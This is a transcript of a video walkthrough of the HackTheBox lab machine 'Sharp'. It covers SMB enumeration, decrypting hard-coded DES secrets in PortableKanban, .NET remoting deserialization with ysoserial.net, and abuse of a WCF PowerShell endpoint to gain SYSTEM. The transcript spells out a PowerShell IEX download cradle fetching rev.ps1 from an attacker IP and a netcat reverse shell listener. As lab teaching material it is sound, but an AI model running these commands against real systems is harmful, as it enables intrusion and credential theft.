What's going on YouTube? This is Ipsec. I'm doing Sharp from HackTheBox, and I really like this box because it shows a lot of the low-hanging fruit you can find when analyzing .NET binaries. The first one is just decompiling it to find hard-coded crypto secrets that can be used to decrypt values out of the config, normally are passwords. There's also another way you can decrypt a password that's pretty funny that we'll get into. The second one is a .NET application, just has the .NET remoting endpoint listing on TCP. You can send it a serialized payload and get code execution. And then the third one is just looking at Windows Communication Foundation and seeing there's an endpoint to execute PowerShell and just sending it a PowerShell payload. And this box probably has to be done from Windows, but in order to make it easy between the VPN on a Linux and Windows, I'm going to go the extra mile and convert our Linux machine into a router so we can have both Linux and Windows connected to HackTheBox simultaneously. With all that being said, let's jump in. As always, I'm going to start off with an nmap, so -sc for default scripts, sv enumerate versions, oa output all formats, put in the nmap directory and call it sharp, and then the IP address, which is 10.10.10.219. This can take some time to run, so I've already ran it. Looking at the results, we have just 4 ports open, and these top 2 ports, they might as well be the same ports. We have 135 and 139. 135 is Windows RPC, 139 is NetBIOS. These two, pretty much the same thing, or at least in my eyes. Then we have SMB on port 445, and this weird port 8888. We don't see any nmap like NSE scripts telling us that there's a web server. I realize I don't have Firefox open, so I just open it. But I still like going to this port just to make sure. So we can do a curl on 10.10.10.219, port quad 8, and we don't get anything back. So it's not a web server. So what we're going to do is copy these over into Obsidian. So we take notes. I can press Control N to create a new note. And we'll do 05-enumeration and then nmap and paste the results. It does tell us there is the clock skew of, looks like 1 hour, so probably some time zone is wrong. But yeah, nothing too interesting. Since we don't have a web server or anything, I'm going to do a full port scan just in case something is hiding while we poke at other services. So let's do sudo nmap -p-. We'll do the IP address of 10.10.10.219 and OA nmap sharp-all ports. So that looks good. And now while that runs, we can go and poke at SMB. So I'm going to go in my opt CrackMapExec directory because I just installed this horribly, and this is how I generally run it now. I'm going to do a git pull to make sure this directory is up to date. It looks like it is. We'll do poetry install here just to install all the packages in case it is not. Looks like we're on the latest. So we can do poetry run CrackMapExec SMB 10.10.10.219 to make sure this works. So once this connects, we can potentially get other things. It is telling us it is a Windows 10 box. So I'm going to also put this in enumeration. OS version. There we go. And the things we can do with this, we can potentially do shares. So I'm going to add --shares and see if this gets us anything. And we get an access denied. CrackMapExec does support null authentications if we just pass a blank user and blank password. So we should check this out as well. And we get access denied. It is taking a while, and we do get some shares. So I'm going to copy this to the notes as well. And we'll create a new note saying 10 share unum. And we can always clean these titles up later. I just don't want to spend too much time thinking of what to put here. But we do definitely want to keep these notes. So instead of shares, we can try some other things. So it does support like users. There's a password policy one as well. So I'm trying to run multiple simultaneously just to see what information we can get. So passpol. And if you go to ipsec.rocks, you can probably just search like SMB null authentication and find a bunch of other things of using other tools than CrackMapExec. You should always test multiple tools because sometimes the tools do fail. And we get status 9 on both of these. So the only thing we really have is that spider share. is that, whoa, that was taking a while actually. I had to Control-C that. I just assumed after seeing access denied it was done, but it could still be working. So let's go back into opt crackmap. And then we're going to do -M for module and spider_plus. And this is going to do something pretty cool. And I'm going to create another pane so we can copy the results. But it's going to crawl all the shares and put the results in temp CME spider plus. So I'm just going to copy that. We'll go over here and move that here, and we'll call this SMB enum. Or we'll call SMB files null auth.log. And let's see. Spider plus, it did not copy the entire path. So let's do temp. Let's recopy that. No, it did. What? Oh, it's a directory. 10.10.10.219.json. Okay, that's what the issue was. So if we look at this file, we can see it's just JSON. We can do JQ to make it pretty, and we can look at the files. If we wanted to, we could probably find a JQ query to like get rid of these modify times, or we can just like grep-v on time underscore, and then pipe to JQ again to make it pretty. But I want to keep those times in because I just want to look to make sure there's nothing unique. I see the common thing is November 12th and November 14th. So I'm going to do a grep on time and then also a grep on 11-1 and then 2-4 in brackets. So this is going to do both of those. I'm going to do -v to exclude it. And we can make sure that grep is valid by just grepping it, and it only shows those values. So the share is only accessed during 2 times. And I always like finding outliers because whenever I look at files, I look at the one that has the unique timestamp or the most unique timestamp. These look to be all the same. There is a .zip file, and we also have portable kanban pk3.back. So I don't know what kanban is. Let's now go and Google this. So I'm going to Google portable kanban. And maybe I'm pronouncing that correct, maybe I'm not. Who knows? But we can see portable kanban is an exploit. This exploit DB thing, I think, came out after the box was released, so I'm going to ignore all like potential exploits for it. Let's see. Maybe we can just search kanban and see what this is. So it looks like it is some plugin for Atlassian, probably Jira, some package management tool. We could watch this video to figure out what it is, but I'm happy now. There is a bunch of files we can download, but the main thing I want to look at right now is this .zip file. So we can try this CrackMapExec again. And then if we do --get-file, I think, and we can say kanban pkb.zip to pkb.zip. And I probably have to go into opt crackmap. One day I'm going to reinstall crackmap and do it correctly. And maybe I'll do a video on that one. But we get access denied. So I think there's actually a bug with CrackMapExec and trying to download files with null authentication, because I was trying this quite a bit, like even changing up the quotes in case like a / got escaped. But I think this just happens when you do null authentication. And this goes back to knowing how to do the same type of attack with multiple tools, because if you just depend on one tool, when you run into an issue, you're just kind of SOL. So we're going to switch over to smbclient. And if we tried a similar thing like u is equal to nothing, and then //10.10.10.219 kanban, and put nothing for the password, we get authentication failure. To do this null authentication in smbclient, we need -N. And we do anonymous login, and now we are here. So every tool kind of has its quirks. It's good to know how your tools work. So I'm going to do git pkb.zip, and we can download this. Does this support mgit? Let's see. mg. It looks like it does. Mgit is download all. So actually what I want to do is make dir SMB, make dir KanBan to stay kind of organized. We can do this authentication again and do mget_stir. And there's probably a way to do force to say yes to everything. It's probably like -F or -Y, but I'm just gonna hit Y a few times and accept everything. It shouldn't take too long. Come on. Or we could do like another tool to do this. I'm trying to think of what I used to use. I think SMBmap would also download files, but now we have a bunch of files. So if we go back to the previous directory of KanBan, and one thing we probably should do is cat smb files auth-log, and I'm going to grep-v time and size, like that. The or syntax is just \pipe and grep. So we got that, and I'm going to greps for colon space bracket. And our JQ, if we do JQ dot, we can go in one directory to ignore KanBan. And now we just get files. So alt-F, do double quotes. This is going to set the field separator to double quotes. And now this should have worked, but it did not. Let's see, alt-F, print 0, 1, maybe 2. Okay, 2 is the field separator. If we look at what we were doing wrong, 1 was getting what was before this. So 2 is this. So now we just got a list of files in the KanBan share. We can copy this and say KanBan share and paste all the files. Okay, so the next thing we were doing is going through this pkb.zip. I just want to make a directory pkb because whenever unzipping things, it can like destroy your current working directory. So I always make a habit to make a directory before I unzip in case it does what it just did and put things in the current working directory. So it looks like we have bunches of DLLs. So what I'm going to do is we're going to copy pkb into SMB. And now our SMB share has KanBan and pkb. And since this is a executable and Windows stuff, I'm going to go over to Windows. But before I do that, there's two things I want to do. IP address, get my machine's IP, which is 192.168.1.230. And then we want to start up an SMBServer. So SMBServer -SMB2 support -user is IPsec -password is also going to be IPsec. And then the share name, which will be share, and then pwd to get the current working directory. And we have to run that with sudo. And now I'm just going to quickly go over to my Windows machine. And we can mount this drive. So going to 192.168.1.230/share. I use the same credentials on this VM, so it just didn't prompt me. And we have KanBan and pkb. So I always like working off of my desktop or the file system instead of working off a remote share, especially when like this isn't a true file server, since it's just Impacket, and anything Impacket does is hacky and prone to bugs. So if I was running maybe like SMBD, I'd be more confident working off the share, but since I'm not going to worry about it. So if we open up portable KanBan, it looks like we create a local file, blank password. We can load this program, and we don't really have anything. If we looked at the files on the share, if we go back to the KanBan directory, we have a lot of files that aren't in this pkb directory. Namely, one that just got created if we had read everything. Can I make this bigger? There we go. This, not kanban.cfg, but pk3. This PK3 file is the backup, and there's two things interesting about this. I'm just going to copy the backup to our KanBan install, and then we'll open it up in Sublime, and we can see more jQuery. Let's go over to our Linux box so we can view this jQuery better. So let's go SMB, KanBan, and then cat portable KanBan pk3.back to JQ. And we can also see there's a .back and a regular one. So what I could also do is md5 sum portable KanBan.pk star, and both these have the same md5 sum. Oddly, the pk3.md5 has a different sum than this. I don't know what's going on there. But here we can easily view the config. So columns, nothing too interesting there. Tasks, doesn't look interesting. Now we have administrator and encrypted password. We can see if this encryption is real encryption by just doing echo-n and then attempting to base64 decode it. And it looks like it is. I think ent is a command for entropy. 3.87 bits per byte. This doesn't seem too random. If it was like properly encrypted and completely random, this would be closer to 8. We'd see like 7 point something. So because this is low, leads me to believe it's really bad encryption. I hope I'm speaking that right. I actually didn't run entropy beforehand, so did not prepare for that result. I was expecting it to be more random. But whenever you see encryption and it's not high entropy, chances are you should poke into it. So administrator, lars, so we get a potential username here. We can try like blanking out the administrator user. So if I go back into commando, and actually before we do that, we can see this role is admin, this role is user. What if we created a new user? So I'm going to go into commando. We're going to look for administrator right here. Find where this bracket begins. And I'm going to copy this whole thing. And then we're going to find where the next user ends. So looks like right here. This is the next user of lars. So I'm going to do comma, and then paste this. And we are working with this. We probably want to give it a different ID. So I'm just going to do like A2 because I don't think that exists. The name, I'm going to give it IPsec. Email, encrypted password. I'm going to blank out the password. And then we're just going to save this config. And this is in desktop/pkb right here. Is this .back? It is .back. So let's go desktop pkb, and we're going to copy that backup file to KanBan, paste, and I'm going to delete whatever config was here before, and we're going to open up KanBan again. So it says data successfully recovered from a backup file, and if I do IPsec with a blank password, lets me maybe log in. I probably screwed something up with the config, but let's try that again. So open this up, IPsec. If you click continue and ignore, can't find plugins. So let's try copying the plugins in. This was also on the SMB share. Maybe we should have just ran portable KanBan from here instead of the zip. So now we have the plugins. Let's see if it still errors. Let's close that. I just accidentally opened the DLL. Portable KanBan. Let's do IPsec, enter. And okay, no error message. We get this. And if I click on this settings icon, we can go to users. And this tool lets us hide passwords and view them. So we can potentially get user credentials out of here. So let's see if my copy and paste between VMs is working. If I do this, it looks like it is. So let's go and create Notepad. And we can say administrator that, and then lars, and put this password. Lars, there we go. Instead of colons, I'm going to use pipes because that's markdown. And then we will paste this over into Obsidian. And there's another way we can go do this. So if you didn't want to go through the application, we can always open that up in something like DnSpy or ILSpy and decompile and look at how it does the crypto. So let's do creds, paste this, creds, and then we'll say method user pass KanBan. There we go. We need one last thing in Markdown. Like that. And now we can view it. So what I'm going to do is create one, and we'll say 15 KanBan. And the other thing we have to do is go back to our Windows machine and take a screenshot of this. So I'm just going to do print screen, loads up Flameshot because I have that on my Windows VM. And the copy and paste with whole screenshots, it doesn't work, I don't think. So I'm just going to save the capture, and we're going to save it on, let's see, where's desktop? I guess desktop's not here. Let's see, /192.168.1.230, share, and then this will be KanBan GUI. And then if I open up places, home, then we can go /opt ht, or not opt, home htb. What is this? You can see my home directory is getting awfully messy. I need to rebuild my VM soon. SMB, we can drag the picture here. So now we have KanBan GUI. Extract cred via config. And at the end of the video, maybe I'll write an explanation on exactly what we did. But time is of the essence, so let's just move on to how else we could get this credential. So since the application can natively decrypt it, and there's always the chance that we couldn't get this application working, we should go with another option as well, and that is DnSpy. I don't know if I have DnSpy on this VM, but downloading it is easy enough. So we just go to Google, DnSpy, and then go over to releases and download the .zip. I'm going to open this, and I'm going to make a directory DnSpy. So new folder DnSpy, and we'll just copy it over here. And then we can open, oh, I did not mean the console. I want the regular .exe. And we open DnSpy. I can do file open. And we want to do, let's see, desktop KanBan, and probably KanBan's DLL as well. So we can poke around KanBan to see what's there. I like looking at DLLs first because that's more where code is. And if we look at, let's say, out of all these, crypto sounds really interesting. So let's look at crypto. And scanning for the decrypt function, we can see it's just doing descrypto and nothing really here, but it does do 2 static bytes real quick. So it's going to call RGB key and RGB IV, which is an initialization vector, and we have 2 secrets. So I'm going to take a screenshot. And actually, I'm going to make this a bit smaller so we can get this whole function. Print screen, highlight, and then we can put text and say hard-coded crypto secrets, and then put a box around that, like that. And then, of course, save the capture to a file. And we'll say crypto secrets. So now what's left is going back over to a Kali box and building a quick script to decrypt this. So I'm going to copy and paste that string, and I'm going to go into just my sharp directory. We'll call this dec.py, I guess, or give it kanban-dec or kanban-decrypt.py. There we go. So I'm just going to paste those two strings because we need the secret and IV. So let's see, get that. Okay. And I hit DW to delete word. And it's going to delete a word or up to where the next string is. So let's put this all in single quotes because that's how I like it. And we're going to have to put our imports. So I'm going to be really lazy with the script. And I'm just going to import sys so I have access to argv. I'm going to import base64. So from base64 import b64 decode. And then we also want to import des to decrypt. So let's go, actually, we don't need the password yet. So we can say the password is going to equal b64 decode sys.argv1. And we'll import the password. And this comes from the config. And then we want to initialize the crypto object. So I'm just going to call this c is equal to des.desKey. I think that's the function within des. And we want to put the string. That, and this is Python 3, so it probably wants it in byte form. And if it errors out, it doesn't work, I'm going to take the byte form off. And then we need IV is equal to this. And then let's do print. And we can say C for crypto.decrypt. Pass WD, initialization is equal to IV, and padding is equal to true. And when you work with CTFs and Pythons a lot, you just remember exactly how the small libraries work. Actually, to be determined. We'll see if this works. So I'm going to cat SMB. Then we'll go into Kanban. And we want portable kanban.pk3. JQ. And then grep pass. I'm going to grab both of these passwords. So I'm going to do, whoops, I think I right-clicked and did paste. Python 3, then Kanban decrypt, paste, end of file line 9. So I made an error somewhere. Let's see, did not do a last quote. Typo on base64. Des has no attribute des key. So let's see. Python 3 des decrypt. Single des. Des new. See, this is using crypto.cipher. And we can probably switch to use this real quick. Or we can look at this one. This is PyInstall des. Des key with a capital D and a capital K. So let's try that. Capital D, capital K. There we go. So administrator was that. We can go over to our credentials and eyeballing G2 with arg lowercase. That looks correct. And we could also go for the next one and see what this is. So if I paste this, we get the other password. So that is both ways we can grab the KanBan password. So the next step to do after that is, of course, spray with those passwords. So I'm going to do cd opt CrackMapExec, and we're going to spray with administrator and lars. So first we have to create the user and password file. So I'm going to go htb sharp users.txt, and I'm going to look at this, go to my creds, administrator, and lars. So administrator, lars. I'm going to do the same thing with passwords. So password.txt, and we're going to copy and paste these. So paste, and then we can paste this. So we can run poetry, run CrackMapExec. Is it all caps or not? No caps. CrackMapExec. Yep. SMB 10.10.10 129-U. We'll do HTTP sharp users.txt -p HTTP sharp passwords.txt. And then let this go and see what it results. It can take a little bit to run, so we screwed something up. Is the IP address actually 129? Let's do less HTTP sharp nmap sharp.nmap 10.10.10 219. Slight case of dyslexia or misremembering, but there we go. If you don't get any results from CrackMapExec, chances are the IP address is wrong. So we get a hit. We have lars with a successful credential. So we're going to send this over into our notes and say 20 success. Actually, yeah, we can do this. 20 lars cred. CME. And then this KanBan invalid, because we tested this and did not get a hit. So always update your notes with what is valid and not. Since we have a hit on this credential, I'm going to specifically try this. So lars-p, and we're going to use WinRM to see if potentially we can access it that way. Because CrackMapExec doesn't say pwned, I know I can't just get a shell via this, but there's a chance we could have got a shell via WinRM. We didn't. And this is why I always try SMB first, because SMB will auth if you have no shell or shell, where WinRM will just fail. So let's go back here, switch it up to SMB, and then we can do -- shares again. So looking at this, we'll see if he has access to anything else. And then if I don't have access to shares, that's when I may try to go into other things. Like, let's see, other things like remote registry, things like that. But we do have access to this dev share. So I'm going to do -m spider_plus. And we're going to look at this one. And it's going to write the output into spider plus. If I cat this with JQ, and of course, this is a directory. And we have two folders. We have this KanBan folder up here again. Well, that's IPC. So we don't have access to KanBan. We have access to IPC and notes. So let's go back and do our grep syntax of grep-v. And we can say time and size. And then I want to grep for semicolon bracket. And then we'll awk-f double quote print 2. And I will leave IPC and dev here because those are the two shares. And we'll copy this over to our notes. So going back to lars cred, we can say share enum, paste, and then IPC and dev. So these are shares. So I like just notating that with double backslash and putting a space between. The IPC, chances are this isn't too interesting. WinSock catalog change listener, I don't know exactly what that is. I'm guessing it has something to do with what's going on later in the box. But we also have this dev share. And this has client.exe, remoting library, server.exe, and notes. So what I'm going to do is we'll go into HTTP sharp, go in SMB, make dir dev, and we'll go into dev and say SMB client -u lars 10.10.10.219 dev. We need backslashes maybe. Let's see. Oh, no, we don't. We need a capital U. And then the password, let's go CME again so we can just copy and paste that password. Or we could have went into Obsidian because we're taking notes. But now we have SMB. I can do mget-h. Let's say -f, -y. Maybe there's no, I think I did in a video, but we'll just do y for each file. And we downloaded a handful of files. So we have a server.exe, remoting library, notes, and client.txt. If we look at notes, it says migrate from .NET remoting to WCF, and then also add input validation. But we don't know much. We could strings client and see what there is. This is a .NET binary. We can see the user is cube0x0. So we could go into opt CrackMapExec and do poetry run. And then this time specify the password as HTTP sharp passwords and the user as cube0x0 and see if we get a hit because we just got another username out of metadata. We did not, but doesn't look like anything interesting here. But strings is not a good way to analyze a .NET binary. Doing it on Windows is. So let's go over into Windows and we'll go back to our share. And where is this? We can refresh. And now we have this dev. So I'm just going to copy the dev folder over to my desktop. And we probably should have put all these in a sharp folder so we had a bit better organization scheme. But hindsight is 2020. Doing Control O to open, we go to desktop, dev, and then we can look at, I guess, server, and we can do remoting library and client to open everything up. So if we look at server, we can see it's using system, remoting sample, and let's see, this is on port 8888. So we know at least that. And it's doing binary service formatter, remoting. Here's a potential endpoint. Whoa, I did not mean to click that. Register well-known service type. But what I'm going to do is screenshot this start server. And then I want to highlight the port and potentially this, because this looks like how we can access it. Secret sharp debug. Whenever you see secret and some type of source code, chances are that should be highlighted. So we'll save that capture to dev server port. And let's go over and look at the client using system, remoting sample, and it looks like we have credentials. So debug and sharp debug application password 123. So let's go back over to parrot. Let's see, I am in CrackMapExec. So debug -p put the password, since it has a special character of a quote, I'm going to put it in quotes, or a special character of an exclamation point. And it does succeed. So we know that is successful. Let's check winrm. And it's probably, let's see, come on. It fails. We can do -- shares to see if this has access to anything else. And it doesn't. Same shares. It doesn't even have access to the dev. And if I was more noticeable at first, I think when we did the null authentication, dev did show up. I just missed it. So we do have credentials. So let's go back to creds and say dev client debug and paste that. So going back over to Windows, we can print screen and highlight this. And let's see, where is the box? Username, password. So at this point, we'd search the code. And one of the things is this is doing serialization between the client and server. So let me just creds debug. Okay. So if we look at, let's see, remoting library, does this have anything? Like nothing in this. So if we look at the server, this is like hard to explain. I hate doing any reversing live. So we got a binary server formatter sync provider, and then it's going to accept this from the client and print it. So if we went over to Google and Googled like, let's see, exploit.net remoting, we got this tool here. And let's see, this NCC group article is also good. So reading these two things would put together how to use this endpoint. And we need this application. So I'm going to download it. And then we're just going to send a serialized payload to this service. So I'm going to copy that here, open it up, and we're going to open this in Visual Studio. And we just build it. And the other application we need, which is probably on this VM already, is ysoserial.net. So I'm just going to go to this application, go to releases, download it. And I think I did mention it, but if you looked at note and dev, so if we went back to dev, SMB dev, less notes, it's using .NET remoting. So that's also a hint. So let's go release. Let's see, this is ysoserial. So I'm just going to ysoserial. The one thing I hate about ysoserial.net, and it's a super minor nitpick, is the executable they give you is still ysoserial.exe. And ysoserial initially was a Java deserialization framework. But, oh well. So what we want to do is build the solution. And we probably should have changed this over into release. Whenever you build things, take it out of debug, do yourself a favor. Every now and then debug has issues. Since we're running this on a local machine, we won't have an issue, but still best practice. So we go into CMD and we want to copy this, go into this directory, and that's remoting service. We want not the service, we want the exploit. I think I went in the wrong directory. CD Oh, example and exploit. I was reading these two as the same, example and exploit. So we definitely want to go into the exploit remoting service, and then the bin directory, and then release. So when we run this tool, we have a bunch of options. So before we can run this tool, we need a serialization payload. So I'm going to open a second command prompt. And we're going to go into desktop, then ysoserial, and ysoserial.exe. And if you follow, let's see, these instructions here, it's going to have you use the binary formatter with a type confused delegate. So, or delegate, no, which one? Pronunciation is hard. So ysoserial.exe-f binary formatter. And again, if you look at the code as well, where's DnSpy? I think it's saying binary formatter here, binary service formatter. So -g type confuse del e gate, that's how you spell it, -o, we want base 64, so we can just copy and paste from a clipboard. And then the command we want, let's see, PowerShell IEX, new object, net.web client. Let's see, that looks good. Actually, don't put this in quotes. Download string, HTTP 10.10.14, and then 3. 3/rev.ps1. So we run this, and we have the payload. And now we're going to run into an issue, because we have an application here, and this application is an executable. So we can't run ExploitRemotingService.exe on our Linux machine. It may be possible because this is .NET, and because it's .NET, I think we may be able to run .NET Core on Linux, but there's an easier way where we can have both Linux and Windows on the same VPN for HackTheBox with some routing magic. So I'm just going to build this payload here, so we're not jumping between too many subjects at once. And the pass, we need, let's grab the pass from Kali, or Parrot. Grab this, copy, paste. And then we need to specify the endpoint of this .NET remoting. So TCP 10.10.10.219.888. And then the endpoint was this, raw, and we want the base 64. So obviously my Windows machine cannot hit this endpoint of 10.10.10.219. So if I CLS ping 10.10.10.219, can't get there. So the way around this is we have to create a route. So we're going to convert our parent machine into a router. So I'm going to do sudo echo 1 to proc sys net IPv for IP_forward. What? Permission denied. Let's do sudo su echo 1 to this. There we go. What I'm actually going to do is do this in Obsidian. So I'm going to create notes. I'm going to put this at the start of this. So O2. This is why I do these number credentials, because if I want to put something between, something, I can easily go back and do that. And I'm going to say turning parrot into a router. There we go. So the very first thing we did was enable IP forwarding. So this enables, let's see, there we go. Enable IP forwarding. So now when our box gets a packet, it can actually do some type of routing. The next thing we have to do is create a IP tables rule to take something from Ethernet 0 and put it to ton 0 and do some natting. Because if we don't do any natting whatsoever, then when HackTheBox gets the packet, it's just going to see a IP address of whatever a source is, and it's going to fail. Actually, we may be able to verify that. So let's go to Windows real quick. Route add 10.10.10.0/24 netmask 255.255.255.0 and then 192.168.1.230. That's the gateway, right? IP ADDR, I already have it. 1.230 is my guy's VM. Let's see, GW. Route add. We gotta escalate. There we go. Let's make this bigger, and then we can go back here and grab our previous route add command, paste it in, and bad argument 255. So I notice I do CIDR notation and netmask, which is redundant. That doesn't work. I don't think on Windows you specify gateway. I think you just do gateway after. Still bad argument. Route add help. Let's see. Route add. Oh, it wants mask, then netmask. That's silly. Let's do route add IP address, mask, gateway. There we go. So I do a route print now. We can see anything to 10.10.10.0/24 is going to go to the gateway 192.168.1.230. So we can test this out by going back to a parent machine and do sudo tcpdump-i ton0, ICMP, and -n to not do DNS lookups. And then we go back to commando and do a ping 10.10.10.219. We don't get any results. If we look back at our TCP dump, we're not getting any output. And the reason here is we didn't create an IP tables rule to forward between two interfaces. So what we want to do is say, let's see, on Windows, was it route add 10.10.10.0. This is mask. There we go. Okay. So the next thing we have to do is enable forwarding. So let's go back up on our Linux machines and, well, we enable forwarding, but we need to do the forwarding. So if we do IP tables -a for the chain forward, we want to go from ton 0 to ETH 0, so that's in, out. And we only want to forward things with a related or established state. J, accept. And the reason why we do this is because there's no way to go from the VPN to Windows directly because of port forwarding. So we just say related established. It's probably hard to understand if you don't know the basics of networking. So this time we're going to create the reverse rule, but allow our Windows machine on ETH 0 to go out our ton adapter -j accept. So if we add these rules to IP tables, now we do IP tables -l, we can see the rules are there. And if I do this ping again, still not working. If we look, we do see we attempted to ping. And what happened is we're pinging our HackTheBox IP with the wrong IP address. Like 192.168.1.227 is getting to HackTheBox, and this machine's like, I have no clue how to send this back. It doesn't have that routing. So what we have to do is create a NAT rule. And this NAT rule is going to rewrite the IP address to be the IP address of that is connected to the VM. So let's see, add NAT, And this is sudo iptables-t nat-a post routing -s. So this is only going to apply with IPs of the source of the network 192.168.1.0/24. So we're not rewriting anything that isn't coming from Ethernet 0. -o, ton0-j, masquerade, and masquerade is the magic option that would just do the rewrite for us. So if I paste this rule in now, and we go back from commando and ping, we actually get a result back. If we look at this, the pings are coming out of 10.10.14.3 to 10.10.10.2.19. So now our parent machine is acting as a router. All is good in the world. So hope you enjoy this notes. The next thing to do is obviously go HTTP, make dir dub, and we have to create a reverse shell. So let's copy, what is it? User, what is reverse shell? Let's see, locate invoke dash, and it is not powersploit. Let's see, invoke dash PowerShell. Nashang. Nashang is the thing I was thinking about. So user share Nashang shells invoke PowerShell tcp.ps1, call it rev.ps1, and then we want to copy the reverse line, paste, and our IP address is going to be 10.10.10 or 10.10.14.3 port 9001. And then we can do sudo python3-m http.server 80. And then this next one is going to be sudo nc lvnp 9001. Go back to commando. And we can finally run this exploit. So again, this is running ExploitRemotingService, giving the user name and credentials, telling it it's a raw payload, sending the base64, which is going to do the PowerShell IEX command. And we have a typo. Oh, that sucks. Does it tell us what we did wrong? TCP. Let's see. ExploitRemotingService. Okay, I think I see it. We did not end the quote here. So we put pass in quotes for show up application, but I did not put the other double quote. So try running this again. We get an error message, but if we go back to parent, we see it hit rev.ps1 and we have the shell. So good news for us, I guess. And bad news for, who is this? Lars. So with the shell, what we probably should have done is our lwrap because I don't have up and down. So I'm going to redo this real quick. So let's go back over here, run this command again, and sudo rlwrap. It's funny when you rerun it to fix something and forget to fix what you wanted to fix, but thankfully, getting the shell is easy. So now I have up and down with rlwrap. Awesome. So let's go and see if we can get the flag. And looking at the root directory, we do have KanBan and dev, or I said I'm backwards, but you see them there. That's where the shares are. So if we do dir here, we just have two users, Lars and administrator. We do the desktop, we can see user.txt. If we look at documents, we can see a WCF directory. And the easiest way to copy the directory is just use compress archive to compress it into a zip. So we can say -path WCF and then destination path WCF.zip. And this will zip it up, and then we'll just copy it over to a box afterwards. Now, in order to copy it, I'm going to use netuse. We can do like, I think it's new PS drive and put credentials there, but we have to use like PowerShell secure strings and it's just a pain. So net use x colon and then 10.10.14.3/share. And then the password was IPsec, and then the user was also IPsec. So let's see, do we have an X drive now? We do. So I'm going to go back to the C drive, and we can copy wcf.zip to x colon. And if we go look at that X drive, let's see, /SMB. Oh, I was in HTTP dub. I put a file where it shouldn't have been. Oh well. Let's go to sharp. And then SMB. We can see wcf.zip. And like I said before, I always like creating my directory first. So copy WCF there. And then unzip. And it actually had created the WCF directory for us. So this one didn't clobber our working directory, but we can just move WCF \* here, and then make sure the WCF directory is empty. We got a .vs, so let's go WCF/.vs, copy it here as well, and now we can rm-rf WCF. So we have a remoting application here. So let's go back over to Commando, and we're going to reverse yet another. Well, we don't have to reverse. We had the source code, so yay for us. So let's go to the share and copy WCF. And we could have just got the zip, but we'll see how long this takes to copy over localhost. Not long. So let's close a bunch of these windows because I am horrible when it comes to window management on Windows. That was a funny sentence. But we can open this WCF directory. Let's see, open with Visual Studio 2019 and see what this program is about. And I think our notes just suffered, but I don't want to take time and document a bunch. So this video, sorry, the notes aren't great. We have a client, so let's see if we have a username and password hard-coded. We don't. So we see this client, and it's doing net TCP localhost 8889. So if we go back to a parrot and let's see, exit out of here. Let's go into an nmap directory and /all ports.nmap. We do see it is actually listening. It's just not a top 1000, so it's not in the default scan, but 8889 is open. So we can change this to 10.10.14.3, port 8889, and it goes to WCF/new WCF endpoint. And it's just that one command. So we can look at probably remoting sample to see how this works, because it's doing console write line client.diskinfo. And this client, we don't know exactly what this is. This is just IWCF service. So if we go into remoting, we can see what commands there are. It was doing users disk info CPU info, I think. If we look at program, disk, CPU, and RAM. So it also has this InvokePowerShell syntax. And let's see. Here is how it executes disk info. So it's just going to use WMI. CPU info, WMI, RAM info, WMI, get users. It looks like this is actually doing PowerShell, get local username, .name, and then invoke PowerShell, and then adding script text. So we just call invoke PowerShell with the PowerShell we want, and we should be able to get a reverse shell. If we look at the server to see how this is working, code view, okay. WCF service, it's going to listen on 8889. So we could, if we wanted to, take a screenshot of this on stop. So let's just try modifying our program. And the very first thing we want to do is run it as intended. I don't want to do the invoke reverse or the PowerShell yet because who knows if it works. Actually, what we can do is another console write line. And this time we'll copy this and we won't do malicious PowerShell. So invoke PowerShell. So let's copy this. Client dot invoke PowerShell, and we'll say, let's see, what is it? Get child item. I'm 99% sure that's PowerShell. That should get the directory listing. CMD get child item. Of course, have to be in PowerShell. Yep, gets child item. So that looks good. Let's see. We have something wrong though. Represent a character UTF-16 code unit. And I honestly don't know. I think I'm just going to compile and hope it works. I don't know how to do like all the string conversions in .NET. Let's see. Rebuild solution. Is it going to build? If it doesn't, too many characters literal. Maybe double quotes? Do quotes matter? It's not erroring. Programming languages are finicky. That's all I have to say about that. So it looks like we have it running, or compiled. So we can try executing it. And we could have also done this just through start. So we could try this and see what happens. You're debugging, continue. Where's the output window? This? So we're going to 10, 10, 10. Oh, I don't know why I did 10, 10, 14, 3. We want 10, 10, 219. For some reason, I think in my head, I was doing a port forward on my box. Let's see. The login attempt failed. So we don't have any credentials actually in this client. But Windows by default likes always using its, like the credential you're logged in with. We could potentially do some type of token and add a credential here, but the easiest way to test this to make sure it works is just use netuse. So let's go desktop, let's go into this folder. So let's go, actually run as /user. We have Lars's password. And I'm going to do /net only, cmd. And net only means it won't validate. So if I put a bad password here, we got this command shell opened. If I don't have net only here, it's going to attempt a login and tell me it's failed. So net only just like creates the token in there. And you can also use this in combination with like Bloodhound on Windows. So if you had domain creds and your Windows box could reach the domain, you could do net only and then execute Bloodhound or Sharphound within Windows. So we need the password for Lars. So let's go back to here. And we could have also done password for debug as well. Probably doesn't matter. If one fails, I will try the next one. So we have password here. I just press Control-V to make sure we put the correct password. We could potentially say dir 10.10.10.219/dev, and we get a listing. And other users did not have access to dev, so we know we have successfully logged into the server. So let's go into cd /users ipsec desktop, and then we were in dev, and we built, wait, we're not in dev, we're in WCF. And then client, bin, release, and then WCF client.exe. So if we run this, what happens? Kind of error here. Don't know what that one's about, but we do have it getting commands. So we did something correct. This may be a PowerShell line. I'm not sure. but let's see if we get it to execute code. It's doing InvokePowerShell. So IEX new object net.web client download string HTTP 10.10.14.3/rev.ps1. And that looks correct. So let's rebuild solution and then go over here and make sure we have everything running. Doesn't look like we do. So ls rev.ps1. Let's see. Where is my www directory? I know I had done that wrong the last time. You'll notice I have a lot of www directories because I always create files realizing I'm in the wrong directory. But here we go. We got that. And we can do sudo nc lvnp 9001 again. And we go back here. We have successfully built it. So let's try executing this client again. We probably could remove these because we don't need them anymore. It would go a bit quicker. We do have a Git. We do have a shell. Who am I? We're anti-authority system, so users, administrator, desktop, and we can read root.txt. So that will be the box. Hope you guys enjoyed it. Take care, and I will see you all next week.